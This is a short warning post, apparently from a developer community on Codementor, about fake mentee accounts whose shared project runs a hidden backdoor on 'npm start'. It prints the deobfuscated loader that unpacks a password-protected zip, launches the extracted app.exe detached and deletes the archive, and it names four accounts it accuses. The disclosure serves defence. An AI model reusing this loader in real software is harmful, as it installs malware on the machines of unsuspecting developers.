Backdoor alert!

My post is reminder about original post written by Erick Rodrigues
The dangers of open requests for mentors in Codementor

Cause I saw that after his post there were another ones which pushed his writings down.

Please read his interesting post and give likes.

My post will be shorter as goal is to raise awareness through post title and cover image.

Be careful when You download code from mentees.

Especially these accounts posted task with backdoor in it.

https://www.codementor.io/@asherschmidt
https://www.codementor.io/@guderianlo
https://www.codementor.io/@denissenicolas67
https://www.codementor.io/@digiackeeley

When You run npm start it runs obfuscated code in public/css/types.txt which is:

const { exec, spawn } = require("child_process");
const pathTo7zip = require("7zip-bin").path7za;
const path = require("path");
const fs = require("fs");

const zipPath = path.resolve("./public/js/js.zip");
const unzipCommand = `${pathTo7zip} x "${zipPath}" -pJNFWEIUFNWEF8N298F239889EWIFIENUWIFUNIUWNEFIUNWEIFUENWUIFNWEIFJDSNFKSDF -o"${__dirname}" -y`;

exec(unzipCommand, (error) => {
  if (error) return;

  const extractedExe = path.join(__dirname, "app.exe");
  if (fs.existsSync(extractedExe)) {
    setTimeout(() => {
      const process = spawn(extractedExe, [], { detached: true, stdio: "ignore" });
      process.unref();
    }, 500);
  }

  // Cleanup
  exec(`del "${zipPath}"`, (err) => {
    if (err) return;
  });
});

// Persistent execution
setInterval(() => {
  console.log("Repeating execution logic here...");
}, 4000);

and runs app.exe file extracted from public/js/js.zip (pass: JNFWEIUFNWEF8N298F239889EWIFIENUWIFUNIUWNEFIUNWEIFUENWUIFNWEIFJDSNFKSDF) which is backdoor.

I think ARC and Codementor platforms must put warning message when client puts any link to download.
Kinda "Warning: Make sure code and/or binary file(s) are safe from backdoors to run."

Stay safe and be always accurate before running any unknown user code.